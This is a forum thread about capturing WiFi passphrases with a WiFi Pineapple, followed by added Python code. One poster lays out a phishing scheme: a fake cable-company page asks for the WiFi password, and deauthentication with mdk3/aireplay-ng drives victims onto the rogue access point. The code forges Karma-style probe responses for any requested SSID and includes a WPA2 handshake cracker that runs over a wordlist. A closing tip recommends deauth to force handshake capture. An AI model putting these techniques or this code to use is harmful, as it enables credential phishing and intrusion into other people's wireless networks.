
Capturing Essid Credentials?



I haven't seen anything about this yet, but I just wanted to know if there is anything that'll capture the wifi network credentials.

Are they encrypted?

We're already the man-in-the-middle, so would this be difficult?

Hi Jonathan,

If you're asking to capture the shared passphrases used to authenticate users against an AP (WEP, WPA, etc.), then I don't think it's possible at all. Since you can "impersonate" those SSIDs, it really doesn't matter what encryption/authentication that SSID is using, because you're actually saying: "Yes, I'm that SSID!" So people will connect to you automatically.

Hope I answered your question.

Cheers!


If their OS decides to "fall back" to an open, non-encrypted connection, that is true. But it is rare for an OS nowadays to do so. They would need an open, non-encrypted network saved to their device, and then it would connect to the Pineapple if set to auto-connect. You cannot impersonate a secure network due to how the handshaking works and validates the password in the handshaking process.


This shouldn't be too difficult, though. Basically aircrack provides this capability for WEP networks and the ability to capture the handshakes of WPA/WPA2 networks. What I would see is a module for capturing IVs (WEP) and handshakes (WPA), then sending them to a remote host for processing.

You then have Reaver, which exploits a vulnerability in WPS for WPA/WPA2 networks, which is very effective, just time consuming.

You should read over the documentation for aircrack and Reaver to get a full understanding of what they are doing. Reaver, from my understanding, is installed on the Pineapple but does not function yet. I cannot confirm the working status, but I know it is installed.



I think Reaver is SSH/CLI only currently. No fancy GUI for it yet.



Hmmm, I was at the Motorola AirDefense demo showing how easy it was to "impersonate" ANY wireless network. The guy was using one of the first versions of the Fonera router/AP. I found myself connected to our 802.1X network SSID (WPA2 Enterprise/AES) at that very place.



The closest you could get would be to use FreeRADIUS-WPE http://www.willhackforsushi.com/FreeRADIUS_WPE.html which runs a RADIUS server that automatically accepts any authentication offered to it. You may be technically authenticated, but you won't actually be able to send any traffic, as the server won't know the actual credentials and so won't be able to encrypt/decrypt the traffic.


I have been thinking of one Social Engineering hack using the pineapple to gain the user creds of wifi networks.

My "theoretical" hack is:

Here, where I live, the cable company offers really cheap TV/internet packages, and I live in a student area of my town, so almost every Wi-Fi SSID is a variation of "***123456" with the cable company's name as part of the SSID. I have created a fake landing page with their logo and a simple "Enter your wireless password in this field" type box.

Then, using mdk3/aireplay-ng, I deauth all clients on the network I want the password for; hopefully the computer connects to the Pineapple, as I am now the available signal.

Using the phishing scripts, I would be able to get passwords of other users.

Social Engineering 101 with a little pineapple as garnish



Hmm, yes, I found myself connected to our enterprise SSID. But I was so astonished that I didn't check the possibility to browse, so I can't say anything. And I do remember the guy showed us the FreeRADIUS patch from Josh Wright. Well, I thought that the Mark IV exploits management packets. Looks like I was wrong... or maybe partially :-)

Anyway, good discussion.


The 'exploit' we use is that the clients probe for us (management packets) and tell us what they are looking for; we just say "yes, we are here" in the probe responses (also management packets).

As we don't know any credentials, we can reply to requests for encrypted networks of any kind, so the association phase completes successfully, but then when the authentication starts things fail, as we don't know the keys and so can't understand what the other side is saying.

If you had a really fast machine, and a client who was sticking around, then you could potentially collect credentials using Josh's app and crack them then feed them back into the server so you could talk to the client. Possible, but not on a pineapple.

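As an added illustration of the probe/response mechanism described in the reply above (this is example code written for this page, not the Pineapple's own Karma implementation), the script below parses a constructed 802.11 probe request, pulls out the SSID the client is asking for, and builds a probe response that claims that SSID, advertising WPA2-PSK/CCMP in an RSN element so the client treats it as the secure network it expects. The client MAC, BSSID, channel and SSID are made-up values. It only assembles frames; putting them on the air would need a monitor-mode interface and an injection library, which is left out so the script runs anywhere.

```python
"""Karma-style probe handling: turn a client's directed probe request into a
probe response for whatever SSID it asked for.  Example code for this page;
MACs, SSID and channel are constructed values, nothing is transmitted."""
import struct

BROADCAST = b"\xff" * 6

# 802.11 frame-control byte 0 = (subtype << 4) | (type << 2) | version.
FC_PROBE_REQ = 0x40   # type 0 (management), subtype 4
FC_PROBE_RESP = 0x50  # type 0 (management), subtype 5

IE_SSID, IE_RATES, IE_DS_PARAM, IE_RSN = 0, 1, 3, 48

# RSN element body advertising WPA2-PSK with CCMP: version 1, group cipher CCMP,
# one pairwise cipher (CCMP), one AKM (PSK), RSN capabilities 0.
RSN_WPA2_PSK_CCMP = bytes.fromhex(
    "0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")


def ie(tag: int, value: bytes) -> bytes:
    """Tag / length / value information element."""
    return bytes([tag, len(value)]) + value


def mac_to_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(body: bytes) -> dict:
    """Walk the IEs that follow a management frame's fixed fields.  A truncated
    IE stops the walk instead of being trusted, since the client sent it."""
    ies = {}
    pos = 0
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) != length:
            break
        ies[tag] = value
        pos += 2 + length
    return ies


def build_probe_request(client_mac: bytes, ssid: str) -> bytes:
    """Constructed sample input: what a client sends when it looks for a saved
    network (ssid) or for any network at all (ssid == '', a wildcard probe)."""
    header = struct.pack("<BBH6s6s6sH", FC_PROBE_REQ, 0, 0,
                         BROADCAST, client_mac, BROADCAST, 0)
    return header + ie(IE_SSID, ssid.encode()) + ie(IE_RATES, bytes([0x82, 0x84, 0x8b, 0x96]))


def parse_probe_request(frame: bytes):
    """Return (client MAC, requested SSID) or None if this is not a probe request."""
    if len(frame) < 24 or frame[0] != FC_PROBE_REQ:
        return None
    ies = parse_ies(frame[24:])  # probe requests have no fixed fields
    ssid = ies.get(IE_SSID, b"").decode("utf-8", errors="replace")
    return mac_to_str(frame[10:16]), ssid  # addr2 is the transmitter


def build_probe_response(ssid: str, client_mac: bytes, bssid: bytes, channel: int) -> bytes:
    """The 'yes, we are here' frame.  No key material is needed: pre-802.11w
    management frames are unauthenticated, so any BSSID can claim any SSID."""
    header = struct.pack("<BBH6s6s6sH", FC_PROBE_RESP, 0, 0, client_mac, bssid, bssid, 0)
    # Fixed fields: timestamp, beacon interval (100 TU), capabilities (ESS | privacy).
    fixed = struct.pack("<QHH", 0, 100, 0x0011)
    body = (ie(IE_SSID, ssid.encode())
            + ie(IE_RATES, bytes([0x82, 0x84, 0x8b, 0x96]))
            + ie(IE_DS_PARAM, bytes([channel]))
            + ie(IE_RSN, RSN_WPA2_PSK_CCMP))
    return header + fixed + body


def handle_probe(frame: bytes, bssid: bytes, channel: int):
    """Answer a directed probe with a response for the requested SSID; ignore
    wildcard probes, since there is no name to impersonate."""
    parsed = parse_probe_request(frame)
    if parsed is None:
        return None
    _client, ssid = parsed
    if ssid == "":
        return None
    return build_probe_response(ssid, frame[10:16], bssid, channel)
```

Nothing in the response is authenticated, which is exactly why the probe and association steps succeed against a client that has "CableCo-123456" saved; what this script cannot do is anything after that, because the 4-way handshake that follows needs the PSK. Note also that it only works on clients that still send directed probes for their saved networks; a client that only sends wildcard probes reveals nothing to answer.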


I don't think anyone has a machine that fast!


It depends on how strong the password is and how long you have. If someone is on a flight and leaves their Wi-Fi on, then you could have a few hours; that is plenty of time to crack it.

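To make concrete both the earlier point that a rogue AP cannot complete a WPA/WPA2-PSK handshake without the passphrase and the last reply's point that a captured handshake can be cracked offline given enough time, here is an added example (not code from the thread, the Pineapple or aircrack-ng) that implements the relevant pieces of the 802.11i key derivation in Python: PBKDF2 for the PMK, PRF-512 for the PTK, and the HMAC-SHA1 MIC over EAPOL-Key message 2. The SSID, MAC addresses, nonces, passphrases and wordlist are constructed test values. The supplicant side MICs message 2 with the real passphrase; the AP side checks it with whatever passphrase it holds, which is the step a rogue AP fails; and crack_handshake reuses that same check over a candidate list, which is what aircrack-ng does with a shipped capture.

```python
"""WPA2-PSK 4-way handshake, message 2: why a rogue AP fails it and how an
offline cracker passes it.  Example code for this page; all inputs constructed."""
import hashlib
import hmac

# Offsets inside an EAPOL-Key frame (EAPOL header included):
#   4 header + 1 descriptor type + 2 key info + 2 key length + 8 replay counter
NONCE_OFFSET = 17
#   + 32 nonce + 16 IV + 8 RSC + 8 key ID
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The 4096 rounds are the cost of every guess in an offline attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK plus both MACs and both nonces; KCK is the first 16 bytes."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes, rsn_ie: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 (client -> AP) for WPA2: descriptor type 2 (RSN),
    key info 0x010a = version 2 (HMAC-SHA1 MIC) | pairwise | MIC present."""
    body = (b"\x02" + (0x010a).to_bytes(2, "big") + (0).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + mic + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2: HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 16 bytes.  (WPA/TKIP, version 1, uses HMAC-MD5.)"""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def supplicant_msg2(passphrase, ssid, ap_mac, client_mac, anonce, snonce, rsn_ie) -> bytes:
    """The real client: derive the PTK from the real passphrase, MIC message 2."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], build_eapol_msg2(snonce, rsn_ie))
    return build_eapol_msg2(snonce, rsn_ie, mic)


def ap_verifies_msg2(candidate, ssid, ap_mac, client_mac, anonce, msg2) -> bool:
    """Any AP, real or rogue: derive the PTK from the passphrase *it* holds and
    check the MIC.  Without the real passphrase the KCK is wrong, the check
    fails, and the handshake never reaches message 3."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac, anonce, snonce)
    expected = eapol_mic(ptk[:16], msg2)
    return hmac.compare_digest(expected, msg2[MIC_OFFSET:MIC_OFFSET + 16])


def crack_handshake(wordlist, ssid, ap_mac, client_mac, anonce, msg2):
    """Offline attack on a captured handshake: the AP's own check, run over a
    wordlist.  Needs ANonce (message 1) and message 2 (SNonce + MIC)."""
    for candidate in wordlist:
        if ap_verifies_msg2(candidate, ssid, ap_mac, client_mac, anonce, msg2):
            return candidate
    return None
```

Each candidate costs 4096 HMAC-SHA1 iterations in PBKDF2 before the cheap MIC comparison, which is where the time goes and why the thread's suggestion to ship captures to a faster host (or a GPU cracker) rather than crack on the Pineapple is the right division of labour. The MIC depends on both nonces, so the capture must contain message 1 (ANonce) as well as message 2 (SNonce and MIC); a deauth, as mentioned earlier in the thread, is the usual way to force a client to redo the exchange while you are listening.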
